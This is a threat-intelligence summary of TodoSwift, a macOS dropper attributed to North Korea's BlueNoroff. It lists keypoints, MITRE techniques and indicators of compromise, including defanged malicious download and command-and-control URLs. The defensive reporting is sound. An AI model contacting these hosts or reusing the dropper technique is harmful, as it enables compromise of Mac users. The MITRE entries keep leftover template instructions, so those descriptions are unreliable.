Threat Research

TodoSwift Conceals Malware Download Within Bitcoin PDF

Securonix

TodoSwift is a macOS malware dropper linked to North Korea’s BlueNoroff, disguising itself as a legitimate PDF downloader to fetch and execute a malicious stage-2 binary. The analysis details its use of Google Drive links, NSTask-based curl commands, and a signed TodoTasks bundle to drop and run payloads. #TodoSwift #BlueNoroff #KandyKorn #RustBucket #DPRK #macOS

Keypoints

  • A signed file named TodoTasks was uploaded to VirusTotal on July 24, 2024.
  • TodoSwift is suspected to be associated with North Korean malware, particularly BlueNoroff (DPRK).
  • The dropper is a GUI application written in Swift/SwiftUI that masquerades as a PDF downloader.
  • The malware downloads and executes a stage 2 binary while presenting a PDF to the user.
  • Uses Google Drive for downloads, consistent with prior DPRK malware behaviors.
  • Employs NSTask to run curl commands to fetch malicious payloads, then launches the stage 2 binary with specific arguments.
  • IOCs include SHA-256 hashes of analyzed files and various file paths and signing details.

MITRE Techniques

  • [T1071] Command and Control – Brief description of how it was used. Quote relevant content using bracket (‘”Uses HTTP/HTTPS for communication with the command-and-control server.”‘)
  • [T1203] Execution – Brief description of how it was used. Quote relevant content using bracket (‘”Executes malicious payloads through user interaction with the application.”‘)
  • [T1547] Persistence – Brief description of how it was used. Quote relevant content using bracket (‘”Installs itself in a way that allows it to run on system startup.”‘)
  • [T1027] Defense Evasion – Brief description of how it was used. Quote relevant content using bracket (‘”Obfuscates its malicious behavior by disguising as a legitimate application.”‘)

Indicators of Compromise

  • [SHA-256 Hash] context – f1b3ce96462027644f9caa314d3da745dab139ee1cb14fe508234e76bd686f93, 9623c98f7338d56b07b35cd379e31e685e32a9c5317d7bc4af5276916cef4ed3, and other hashes
  • [File/Executable] context – TodoTasks, TodoTasksDocument
  • [Output/File] context – /tmp/GoogleMsgStatus.pdf, /tmp/NetMsgStatus
  • [URL] context – hxxps[:]//drive.usercontent.google.com/download?id=1xflBpAVQrwIS3UQqynb8iEj6gaCIXczo, hxxps[:]//drive[.]usercontent.google[.]com/download?id=1xflBpAVQrwIS3UQqynb8iEj6gaCIXczo
  • [C2] context – hxxp[:]//buy2x[.]com/OcMySY5QNkY/ABcTDInKWw/4SqSYtx%2B/EKfP7saoiP/BcA%3D%3D
  • [Code Signature] context – Identity: MasaMatsu.TodoTasks; Authority: Leap World Hongkong Limited (TL684RWA2X)
  • [Certificate] context – Authority: Apple Root CA
  • [PDF] context – GoogleMsgStatus.pdf
  • [Path] context – Risk factors for Bitcoin’s price decline are emerging(2024).app/Contents/MacOS/TodoTasks

Read more: https://www.kandji.io/blog/todoswift-disguises-malware-download-behind-bitcoin-pdf

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint